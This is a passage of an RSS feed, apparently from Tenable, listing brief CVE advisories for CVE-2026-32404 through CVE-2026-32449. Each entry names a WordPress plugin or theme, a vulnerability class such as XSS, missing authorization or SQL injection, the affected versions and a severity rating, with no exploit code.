            <pubDate>Fri, 13 Mar 2026 19:55:05 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themifyme Themify Event Post themify-event-post allows Stored XSS. This issue affects Themify Event Post: from n/a through <= 1.3.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32449">https://www.tenable.com/cve/CVE-2026-32449</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32448]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32448</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32448</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:05 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eric Teubert Podlove Podcast Publisher podlove-podcasting-plugin-for-wordpress allows Stored XSS. This issue affects Podlove Podcast Publisher: from n/a through <= 4.3.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32448">https://www.tenable.com/cve/CVE-2026-32448</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32447]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32447</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32447</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:05 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Atarim: from n/a through <= 4.3.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32447">https://www.tenable.com/cve/CVE-2026-32447</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32446]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32446</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32446</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:05 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Syed Balkhi Contact Form by WPForms wpforms-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form by WPForms: from n/a through <= 1.9.9.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32446">https://www.tenable.com/cve/CVE-2026-32446</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32445]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32445</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32445</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:05 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elementor Website Builder: from n/a through <= 3.35.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32445">https://www.tenable.com/cve/CVE-2026-32445</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32443]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32443</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32443</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in Josh Kohlbach Product Feed PRO for WooCommerce woo-product-feed-pro allows Cross Site Request Forgery. This issue affects Product Feed PRO for WooCommerce: from n/a through <= 13.5.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32443">https://www.tenable.com/cve/CVE-2026-32443</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32442]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32442</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32442</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in E2Pdf e2pdf e2pdf allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects e2pdf: from n/a through <= 1.28.15.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32442">https://www.tenable.com/cve/CVE-2026-32442</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32440]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32440</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32440</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Ex-Themes WP Food wp-food allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Food: from n/a through < 2.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32440">https://www.tenable.com/cve/CVE-2026-32440</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32439]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32439</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32439</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in WebGeniusLab BigHearts bighearts allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BigHearts: from n/a through <= 3.1.14.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32439">https://www.tenable.com/cve/CVE-2026-32439</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32438]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32438</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32438</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW School Education vw-school-education allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW School Education: from n/a through <= 1.4.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32438">https://www.tenable.com/cve/CVE-2026-32438</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32437]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32437</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32437</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:03 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW Portfolio vw-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW Portfolio: from n/a through <= 1.3.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32437">https://www.tenable.com/cve/CVE-2026-32437</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32436]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32436</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32436</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:03 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW Photography vw-photography allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW Photography: from n/a through <= 1.3.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32436">https://www.tenable.com/cve/CVE-2026-32436</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32435]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32435</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32435</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:03 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW Pet Shop vw-pet-shop allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW Pet Shop: from n/a through <= 1.4.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32435">https://www.tenable.com/cve/CVE-2026-32435</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32434]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32434</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32434</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:03 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW Fitness vw-fitness allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW Fitness: from n/a through <= 4.3.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32434">https://www.tenable.com/cve/CVE-2026-32434</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32433]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32433</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32433</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:02 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in codepeople CP Contact Form with Paypal cp-contact-form-with-paypal allows Blind SQL Injection. This issue affects CP Contact Form with Paypal: from n/a through <= 1.3.61.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32433">https://www.tenable.com/cve/CVE-2026-32433</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32432]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32432</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32432</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:02 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.42.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32432">https://www.tenable.com/cve/CVE-2026-32432</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32431]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32431</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32431</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:02 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Astra Bulk Edit astra-bulk-edit allows DOM-Based XSS. This issue affects Astra Bulk Edit: from n/a through <= 1.2.10.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32431">https://www.tenable.com/cve/CVE-2026-32431</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32430]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32430</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32430</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:02 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IdeaBox Creations PowerPack Addons for Elementor powerpack-lite-for-elementor allows Stored XSS. This issue affects PowerPack Addons for Elementor: from n/a through <= 2.9.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32430">https://www.tenable.com/cve/CVE-2026-32430</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32429]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32429</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32429</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:01 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noor Alam Magical Addons For Elementor magical-addons-for-elementor allows Stored XSS. This issue affects Magical Addons For Elementor: from n/a through <= 1.4.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32429">https://www.tenable.com/cve/CVE-2026-32429</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32428]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32428</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32428</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:01 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Ays Pro Popup Like box ays-facebook-popup-likebox allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Popup Like box: from n/a through <= 3.7.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32428">https://www.tenable.com/cve/CVE-2026-32428</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32427]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32427</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32427</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:01 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in vowelweb VW Education Lite vw-education-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects VW Education Lite: from n/a through <= 2.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32427">https://www.tenable.com/cve/CVE-2026-32427</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32426]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32426</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32426</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:00 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in themelexus Medilazar Core medilazar-core allows PHP Local File Inclusion. This issue affects Medilazar Core: from n/a through < 1.4.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32426">https://www.tenable.com/cve/CVE-2026-32426</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32425]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32425</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32425</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:00 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in linknacional Payment Gateway Pix For GiveWP payment-gateway-pix-for-givewp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway Pix For GiveWP: from n/a through <= 2.2.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32425">https://www.tenable.com/cve/CVE-2026-32425</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32424]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32424</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32424</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:00 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Sprout Clients sprout-clients allows Stored XSS. This issue affects Sprout Clients: from n/a through <= 3.2.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32424">https://www.tenable.com/cve/CVE-2026-32424</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32423]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32423</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32423</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:00 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.4.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32423">https://www.tenable.com/cve/CVE-2026-32423</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32422]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32422</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32422</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:00 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Blind SQL Injection. This issue affects WP EasyCart: from n/a through <= 5.8.13.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32422">https://www.tenable.com/cve/CVE-2026-32422</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32421]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32421</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32421</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Agile Logix Post Timeline post-timeline allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Timeline: from n/a through <= 2.4.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32421">https://www.tenable.com/cve/CVE-2026-32421</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32420]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32420</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32420</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garcia GamiPress gamipress allows Cross Site Request Forgery. This issue affects GamiPress: from n/a through <= 7.6.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32420">https://www.tenable.com/cve/CVE-2026-32420</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32419]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32419</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32419</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fernando Briano List category posts list-category-posts allows DOM-Based XSS. This issue affects List category posts: from n/a through <= 0.93.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32419">https://www.tenable.com/cve/CVE-2026-32419</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32418]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32418</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32418</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:59 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jordy Meow Meow Gallery meow-gallery allows Blind SQL Injection. This issue affects Meow Gallery: from n/a through <= 5.4.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32418">https://www.tenable.com/cve/CVE-2026-32418</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32417]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32417</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32417</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Pochipp: from n/a through < 1.18.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32417">https://www.tenable.com/cve/CVE-2026-32417</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32416]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32416</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32416</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in bPlugins PDF Poster pdf-poster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF Poster: from n/a through <= 2.4.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32416">https://www.tenable.com/cve/CVE-2026-32416</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32415]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32415</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32415</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Path Traversal: '.../...//' vulnerability in Bogdan Bendziukov Squeeze squeeze allows Path Traversal. This issue affects Squeeze: from n/a through <= 1.7.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32415">https://www.tenable.com/cve/CVE-2026-32415</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32414]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32414</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32414</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Generation of Code ('Code Injection') vulnerability in ILLID Advanced Woo Labels advanced-woo-labels allows Remote Code Inclusion. This issue affects Advanced Woo Labels: from n/a through <= 2.36.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32414">https://www.tenable.com/cve/CVE-2026-32414</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32413]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32413</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32413</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Maciej Bis Permalink Manager Lite permalink-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Permalink Manager Lite: from n/a through < 2.5.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32413">https://www.tenable.com/cve/CVE-2026-32413</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32412]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32412</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32412</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Server-Side Request Forgery (SSRF) vulnerability in Gift Up! Gift Up Gift Cards for WordPress and WooCommerce gift-up allows Server Side Request Forgery. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through <= 3.1.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32412">https://www.tenable.com/cve/CVE-2026-32412</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32411]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32411</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32411</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simpma Embed Calendly embed-calendly-scheduling allows Stored XSS. This issue affects Embed Calendly: from n/a through <= 4.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32411">https://www.tenable.com/cve/CVE-2026-32411</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32410]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32410</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32410</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in WBW Plugins WBW Currency Switcher for WooCommerce woo-currency allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WBW Currency Switcher for WooCommerce: from n/a through <= 2.2.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32410">https://www.tenable.com/cve/CVE-2026-32410</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32409]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32409</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32409</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in WPMU DEV - Your All-in-One WordPress Platform Forminator forminator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Forminator: from n/a through <= 1.50.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32409">https://www.tenable.com/cve/CVE-2026-32409</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32408]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32408</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32408</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in themefusecom Brizy brizy allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Brizy: from n/a through <= 2.7.23.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32408">https://www.tenable.com/cve/CVE-2026-32408</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32407]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32407</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32407</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in WPClever WPC Smart Wishlist for WooCommerce woo-smart-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPC Smart Wishlist for WooCommerce: from n/a through <= 5.0.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32407">https://www.tenable.com/cve/CVE-2026-32407</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32406]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32406</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32406</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in WPClever WPC Product Bundles for WooCommerce woo-product-bundle allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPC Product Bundles for WooCommerce: from n/a through <= 8.4.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32406">https://www.tenable.com/cve/CVE-2026-32406</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32405]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32405</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32405</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:56 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in xtemos WoodMart woodmart allows Retrieve Embedded Sensitive Data. This issue affects WoodMart: from n/a through <= 8.3.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32405">https://www.tenable.com/cve/CVE-2026-32405</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32404]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32404</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32404</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Studio99 Studio99 WP Monitor studio99-wp-monitor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Studio99 WP Monitor: from n/a through <= 1.0.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32404">https://www.tenable.com/cve/CVE-2026-32404</a></p>
    ]]></description>
        </item>
        <item>
